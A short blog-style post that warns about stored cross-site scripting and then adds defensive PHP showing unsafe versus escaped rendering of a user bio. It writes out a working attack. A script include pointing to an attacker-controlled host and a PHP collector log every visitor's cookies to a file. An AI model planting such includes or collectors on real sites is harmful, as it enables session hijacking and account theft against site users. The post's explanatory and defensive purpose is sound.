There are tons of cross-site scripting (XSS) hacks out there. I want to alert you to a common and easy-to-do type.

The first step is to insert a JavaScript include tag into a user page on a shared web service:

<script language="javascript" src="http://yoursite.com/cookiejar.php"></script>

Second, you need to put a script at http://yoursite.com/cookiejar.php with the following code:

<?php
if(!is_array($_COOKIE)) die();
foreach($_COOKIE as $cookie_name => $cookie_value)
    file_put_contents('cookiejar.txt',
                         $cookie_name.':'.$cookie_value."\n",
                         FILE_APPEND);

If the website allows you to insert raw HTML or tags, after a while you will see the cookies of all the users who visit the page with the tag you inserted.

So, you should never trust user-generated content. The best way to avoid XSS is to use an advanced web framework, like Django, Rails or Symfony. But if you are writing your own code, always remember to parse the user input, strip the tags or URL-encode all the text.
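
The advice above as an added example (not code from the original post): a user-supplied profile field rendered raw, then escaped on output, then tag-stripped and escaped. The function names and the sample bio are constructed for illustration; HTML entity encoding is used here because it is the encoding that neutralises markup placed in an HTML body.

```php
<?php
// Added example, not from the original post. Function names are hypothetical.

// Constructed sample input: the include tag from the post plus ordinary text.
$bio = 'Hi! <script language="javascript" src="http://yoursite.com/cookiejar.php"></script> <b>bye</b>';

// Vulnerable: raw user text is concatenated into the page, so the browser
// parses the injected <script> include as markup and loads it.
function render_bio_unsafe(string $bio): string
{
    return '<div class="bio">' . $bio . '</div>';
}

// Hardened, option 1: escape on output. Every HTML metacharacter becomes an
// entity, so the tag is shown as text and never parsed as markup.
function render_bio_escaped(string $bio): string
{
    $safe = htmlspecialchars($bio, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="bio">' . $safe . '</div>';
}

// Hardened, option 2: strip tags, then still escape what is left.
// strip_tags() is not an encoder: a lone "<" or a quote can survive it.
function render_bio_stripped(string $bio): string
{
    $text = strip_tags($bio);
    $safe = htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="bio">' . $safe . '</div>';
}

foreach (['render_bio_unsafe', 'render_bio_escaped', 'render_bio_stripped'] as $fn) {
    $html = $fn($bio);
    // A literal "<script" in the output means the browser would run it.
    $verdict = stripos($html, '<script') !== false ? 'EXECUTES' : 'inert';
    printf("%-20s %-8s %s\n", $fn, $verdict, $html);
}
```

Escaping belongs at the point where the value is written into the page, so that text stored before the fix is covered as well.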
